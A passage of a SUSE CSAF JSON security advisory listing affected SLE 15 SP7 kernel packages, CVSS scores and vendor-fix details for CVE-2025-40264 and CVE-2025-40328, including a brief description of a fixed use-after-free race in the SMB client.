"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40264",
"url": "https://www.suse.com/security/cve/CVE-2025-40264"
},
{
"category": "external",
"summary": "SUSE Bug 1254835 for CVE-2025-40264",
"url": "https://bugzilla.suse.com/1254835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40264"
},
{
"cve": "CVE-2025-40328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_close_cached_fid()\n\nfind_or_create_cached_dir() could grab a new reference after kref_put()\nhad seen the refcount drop to zero but before cfid_list_lock is acquired\nin smb2_close_cached_fid(), leading to use-after-free.\n\nSwitch to kref_put_lock() so cfid_release() is called with\ncfid_list_lock held, closing that gap.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40328",
"url": "https://www.suse.com/security/cve/CVE-2025-40328"
},
{
"category": "external",
"summary": "SUSE Bug 1254624 for CVE-2025-40328",
"url": "https://bugzilla.suse.com/1254624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
